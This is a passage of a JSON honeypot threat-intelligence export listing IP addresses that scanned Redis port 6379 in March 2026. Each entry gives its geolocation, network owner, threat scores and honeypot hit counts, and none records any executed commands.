      "last_seen": "2026-03-05T14:52:47.575Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 1.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T14:52:47.575000+00:00",
        "last_seen_30d": "2026-03-05T14:52:47.575000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "149.28.239.163": {
      "attack_count": 5,
      "first_seen": "2026-03-03T23:12:47.000Z",
      "last_seen": "2026-03-03T23:13:57.778Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Piscataway",
      "asn": 20473,
      "as_org": "The Constant Company, LLC",
      "threat_score": 4.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.5,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 45,
        "days_active_30d": 1,
        "ports_targeted_30d": 45,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T22:50:23.455000+00:00",
        "last_seen_30d": "2026-03-03T23:21:21.667000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 45
      }
    },
    "167.94.138.132": {
      "attack_count": 5,
      "first_seen": "2026-03-13T23:31:35.000Z",
      "last_seen": "2026-03-13T23:32:36.141Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 39.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 17.5,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 56,
        "days_active_30d": 20,
        "ports_targeted_30d": 52,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T21:43:35.418000+00:00",
        "last_seen_30d": "2026-03-21T08:12:36.343000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 56
      }
    },
    "173.255.223.149": {
      "attack_count": 5,
      "first_seen": "2026-03-27T12:38:50.000Z",
      "last_seen": "2026-03-27T12:39:53.093Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 172,
        "days_active_30d": 30,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:49:46.519000+00:00",
        "last_seen_30d": "2026-03-31T23:05:35.796000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 172
      }
    },
    "175.178.24.123": {
      "attack_count": 5,
      "first_seen": "2026-03-09T21:06:38.000Z",
      "last_seen": "2026-03-09T21:07:44.535Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 2.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T21:07:44.535000+00:00",
        "last_seen_30d": "2026-03-09T21:07:44.535000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "178.175.135.6": {
      "attack_count": 5,
      "first_seen": "2026-03-30T04:07:08.000Z",
      "last_seen": "2026-03-30T04:08:13.630Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Moldova",
      "country_code": "MD",
      "city": "Chisinau",
      "asn": 43289,
      "as_org": "Trabia SRL",
      "threat_score": 7.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-30T04:08:13.630000+00:00",
        "last_seen_30d": "2026-03-30T04:08:13.630000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "182.43.64.3": {
      "attack_count": 5,
      "first_seen": "2026-03-10T18:45:16.000Z",
      "last_seen": "2026-03-10T18:46:21.851Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 58519,
      "as_org": "Cloud Computing Corporation",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T18:46:21.851000+00:00",
        "last_seen_30d": "2026-03-10T18:46:21.851000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "185.242.226.20": {
      "attack_count": 5,
      "first_seen": "2026-03-08T23:27:12.000Z",
      "last_seen": "2026-03-08T23:28:19.593Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1044,
        "days_active_30d": 25,
        "ports_targeted_30d": 496,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:14:48.861000+00:00",
        "last_seen_30d": "2026-03-26T01:25:57.190000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1044
      }
    },
    "193.163.125.8": {
      "attack_count": 5,
      "first_seen": "2026-03-20T01:40:22.000Z",
      "last_seen": "2026-03-20T01:41:26.986Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 52.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.3,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 54,
        "days_active_30d": 12,
        "ports_targeted_30d": 52,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T01:41:26.986000+00:00",
        "last_seen_30d": "2026-03-31T22:48:31.530000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 54
      }
    },
    "199.45.154.180": {
      "attack_count": 5,
      "first_seen": "2026-03-30T05:25:16.000Z",
      "last_seen": "2026-03-30T05:26:20.341Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 75.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 106,
        "days_active_30d": 30,
        "ports_targeted_30d": 94,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T04:22:29.198000+00:00",
        "last_seen_30d": "2026-03-31T20:46:06.171000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 105,
        "Sentrypeer": 1
      }
    },
    "20.215.89.29": {
      "attack_count": 5,
      "first_seen": "2026-03-24T05:48:59.000Z",
      "last_seen": "2026-03-24T05:50:03.620Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Poland",
      "country_code": "PL",
      "city": "Warsaw",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 6.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T05:50:03.620000+00:00",
        "last_seen_30d": "2026-03-24T05:50:03.620000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "222.223.160.18": {
      "attack_count": 5,
      "first_seen": "2026-03-04T04:07:53.000Z",
      "last_seen": "2026-03-04T04:08:56.602Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Tianjin",
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T04:08:56.602000+00:00",
        "last_seen_30d": "2026-03-04T04:08:56.602000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.56.83.149": {
      "attack_count": 5,
      "first_seen": "2026-03-23T12:37:13.000Z",
      "last_seen": "2026-03-23T12:38:14.741Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 73.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 23.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 201,
        "days_active_30d": 30,
        "ports_targeted_30d": 189,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:03:37.096000+00:00",
        "last_seen_30d": "2026-03-31T23:38:16.910000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 201
      }
    },
    "66.132.172.238": {
      "attack_count": 5,
      "first_seen": "2026-03-24T08:02:07.000Z",
      "last_seen": "2026-03-24T08:03:10.426Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 48.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.5,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 28,
        "days_active_30d": 11,
        "ports_targeted_30d": 27,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-21T15:45:42.848000+00:00",
        "last_seen_30d": "2026-03-31T18:56:34.236000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 28
      }
    },
    "8.130.47.11": {
      "attack_count": 5,
      "first_seen": "2026-03-15T01:37:38.000Z",
      "last_seen": "2026-03-15T01:38:39.395Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 3.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-15T01:38:39.395000+00:00",
        "last_seen_30d": "2026-03-15T01:38:39.395000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "8.142.178.14": {
      "attack_count": 5,
      "first_seen": "2026-03-02T09:03:41.000Z",
      "last_seen": "2026-03-02T09:04:48.793Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T09:04:48.793000+00:00",
        "last_seen_30d": "2026-03-02T09:04:48.793000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "98.89.204.118": {
      "attack_count": 5,
      "first_seen": "2026-03-10T21:44:29.000Z",
      "last_seen": "2026-03-10T21:45:39.450Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 83.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 203,
        "days_active_30d": 30,
        "ports_targeted_30d": 78,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T00:06:48.747000+00:00",
        "last_seen_30d": "2026-03-31T19:42:09.736000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 180,
        "Honeytrap": 22,
        "Dionaea": 1
      }
    },
    "154.83.197.143": {
      "attack_count": 4,
      "first_seen": "2026-03-09T09:38:22.000Z",
      "last_seen": "2026-03-09T09:39:23.185Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Seychelles",
      "country_code": "SC",
      "city": null,
      "asn": 135377,
      "as_org": "UCLOUD INFORMATION TECHNOLOGY HK LIMITED",
      "threat_score": 46.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.0,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 25,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T06:07:57.534000+00:00",
        "last_seen_30d": "2026-03-26T12:39:56.949000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10
      }
    },
    "184.105.247.208": {
      "attack_count": 4,
      "first_seen": "2026-03-14T09:38:54.000Z",
      "last_seen": "2026-03-14T09:40:03.535Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Shawnee",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 45.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 9.0,
        "persistence": 19.2,
        "diversity": 16,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 23,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-07T06:18:06.258000+00:00",
        "last_seen_30d": "2026-03-29T11:01:07.383000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8
      }
    },
    "185.180.141.4": {
      "attack_count": 4,
      "first_seen": "2026-03-29T07:50:12.000Z",
      "last_seen": "2026-03-29T07:51:19.399Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 56.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.3,
        "persistence": 22.5,
        "diversity": 14,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 27,
        "days_active_30d": 27,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T06:50:12.182000+00:00",
        "last_seen_30d": "2026-03-29T07:51:19.399000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 18,
        "Honeytrap": 9
      }
    },
    "213.232.235.104": {
      "attack_count": 4,
      "first_seen": "2026-03-30T21:23:56.000Z",
      "last_seen": "2026-03-30T21:25:00.852Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Moldova",
      "country_code": "MD",
      "city": "Chisinau",
      "asn": 200019,
      "as_org": "Alexhost Srl",
      "threat_score": 7.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-30T21:25:00.852000+00:00",
        "last_seen_30d": "2026-03-30T21:25:00.852000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "185.243.5.22": {
      "attack_count": 1,
      "first_seen": "2026-03-16T15:01:10.036Z",
      "last_seen": "2026-03-16T15:01:10.036Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": null,
      "asn": 23470,
      "as_org": "ReliableSite.Net LLC",
      "threat_score": 80.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 64532,
        "days_active_30d": 28,
        "ports_targeted_30d": 67407,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T16:56:43.994000+00:00",
        "last_seen_30d": "2026-03-30T20:02:11.310000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 64525,
        "Sentrypeer": 7
      }
    },
    "3.132.26.232": {
      "attack_count": 195,
      "first_seen": "2026-03-22T04:29:15.000Z",
      "last_seen": "2026-03-26T04:20:23.443Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 6055,
        "days_active_30d": 30,
        "ports_targeted_30d": 164,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T08:19:23+00:00",
        "last_seen_30d": "2026-03-31T20:25:49.810000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3895,
        "Honeytrap": 1794,
        "Dionaea": 105,
        "Mailoney": 75,
        "Cowrie": 61,
        "Redishoneypot": 52,
        "ConPot": 34,
        "ElasticPot": 11,
        "Ciscoasa": 8,
        "Tanner": 6,
        "H0neytr4p": 5,
        "Honeyaml": 5,
        "Ipphoney": 3,
        "CitrixHoneypot": 1
      }
    },
    "45.91.64.7": {
      "attack_count": 170,
      "first_seen": "2026-03-06T16:20:30.000Z",
      "last_seen": "2026-03-21T18:01:27.776Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 214664,
      "as_org": "JSC Buduschee",
      "threat_score": 73.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.9,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 495,
        "days_active_30d": 24,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T23:59:15+00:00",
        "last_seen_30d": "2026-03-25T08:39:22.068000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 322,
        "Redishoneypot": 54,
        "Honeytrap": 40,
        "ElasticPot": 29,
        "Dionaea": 25,
        "Tanner": 10,
        "Honeyaml": 8,
        "H0neytr4p": 7
      }
    },
    "45.91.64.6": {
      "attack_count": 167,
      "first_seen": "2026-03-04T15:12:39.000Z",
      "last_seen": "2026-03-29T12:44:08.107Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 214664,
      "as_org": "JSC Buduschee",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1049,
        "days_active_30d": 30,
        "ports_targeted_30d": 106,
        "honeypots_triggered_30d": 11,
        "first_seen_30d": "2026-03-02T04:02:42.794000+00:00",
        "last_seen_30d": "2026-03-31T22:00:11.754000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 749,
        "Honeytrap": 193,
        "Redishoneypot": 45,
        "Dionaea": 22,
        "ElasticPot": 17,
        "Honeyaml": 7,
        "Cowrie": 6,
        "Tanner": 4,
        "ConPot": 2,
        "H0neytr4p": 2,
        "Mailoney": 2
      }
    },
    "3.151.241.153": {
      "attack_count": 122,
      "first_seen": "2026-03-08T05:37:36.000Z",
      "last_seen": "2026-03-28T04:19:28.003Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 97.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 2759,
        "days_active_30d": 27,
        "ports_targeted_30d": 109,
        "honeypots_triggered_30d": 11,
        "first_seen_30d": "2026-03-05T15:35:02+00:00",
        "last_seen_30d": "2026-03-31T18:04:10.524000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1851,
        "Honeytrap": 684,
        "Dionaea": 83,
        "Cowrie": 53,
        "Mailoney": 49,
        "Redishoneypot": 27,
        "ConPot": 5,
        "ElasticPot": 3,
        "Honeyaml": 2,
        "CitrixHoneypot": 1,
        "Tanner": 1
      }
    },
    "157.230.101.158": {
      "attack_count": 62,
      "first_seen": "2026-03-05T23:54:52.000Z",
      "last_seen": "2026-03-31T05:53:54.074Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Frankfurt am Main",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 40.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.8,
        "persistence": 22.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 27,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T23:55:52.660000+00:00",
        "last_seen_30d": "2026-03-31T05:53:54.074000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12
      }
    },
    "140.246.124.160": {
      "attack_count": 57,
      "first_seen": "2026-03-04T16:25:35.000Z",
      "last_seen": "2026-03-27T03:47:25.822Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 58519,
      "as_org": "Cloud Computing Corporation",
      "threat_score": 32.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.4,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T16:26:37.552000+00:00",
        "last_seen_30d": "2026-03-27T03:47:25.822000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11
      }
    },
    "140.245.70.130": {
      "attack_count": 56,
      "first_seen": "2026-03-05T05:54:32.000Z",
      "last_seen": "2026-03-16T02:06:30.641Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Korea",
      "country_code": "KR",
      "city": "Chuncheon",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 17.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.8,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T05:54:32+00:00",
        "last_seen_30d": "2026-03-16T02:06:30.641000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "64.62.197.107": {
      "attack_count": 53,
      "first_seen": "2026-03-05T12:24:37.000Z",
      "last_seen": "2026-03-09T11:42:55.380Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 353,
        "days_active_30d": 30,
        "ports_targeted_30d": 85,
        "honeypots_triggered_30d": 12,
        "first_seen_30d": "2026-03-02T00:51:28+00:00",
        "last_seen_30d": "2026-03-31T12:09:24.003000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 203,
        "Honeytrap": 92,
        "Redishoneypot": 22,
        "H0neytr4p": 9,
        "Cowrie": 7,
        "Dionaea": 6,
        "Mailoney": 6,
        "Tanner": 3,
        "ConPot": 2,
        "CitrixHoneypot": 1,
        "ElasticPot": 1,
        "Honeyaml": 1
      }
    },
    "66.183.88.112": {
      "attack_count": 51,
      "first_seen": "2026-03-20T14:09:54.000Z",
      "last_seen": "2026-03-30T17:30:50.782Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Surrey",
      "asn": 852,
      "as_org": "TELUS Communications",
      "threat_score": 33.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.2,
        "persistence": 9.2,
        "diversity": 2,
